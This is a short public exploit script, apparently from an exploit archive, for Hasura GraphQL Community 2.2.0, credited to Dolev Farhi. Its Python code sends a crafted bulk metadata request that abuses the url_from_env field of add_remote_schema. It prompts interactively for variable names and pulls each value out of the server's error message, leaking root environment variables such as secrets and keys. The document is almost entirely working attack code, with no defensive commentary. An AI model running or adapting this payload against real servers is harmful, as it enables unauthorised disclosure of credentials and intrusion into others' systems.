Exploit for Hasura GraphQL 2.2.0 Information Disclosure

## https://sploitus.com/exploit?id=PACKETSTORM:166220
# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure  
# Software: Hasura GraphQL Community  
# Software Link: https://github.com/hasura/graphql-engine  
# Version: 2.2.0  
# Exploit Author: Dolev Farhi  
# Date: 5/05/2022  
# Tested on: Ubuntu  
  
import requests  
  
SERVER_ADDR = 'x.x.x.x'  
  
url = 'http://{}/v1/metadata'.format(SERVER_ADDR)  
  
print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')  
  
while True:  
env_var = input('Type environment variable key to leak.\n> ')  
if not env_var:  
continue  
  
payload = {  
"type": "bulk",  
"source": "",  
"args": [  
{  
"type": "add_remote_schema",  
"args": {  
"name": "ttt",  
"definition": {  
"timeout_seconds": 60,  
"forward_client_headers": False,  
"headers": [],  
"url_from_env": env_var  
},  
"comment": ""  
}  
}  
],  
"resource_version": 2  
}  
r = requests.post(url, json=payload)  
try:  
print(r.json()['error'].split('not a valid URI:')[1])  
except IndexError:  
print('Could not parse out VAR, dumping error as is')  
print(r.json().get('error', 'N/A'))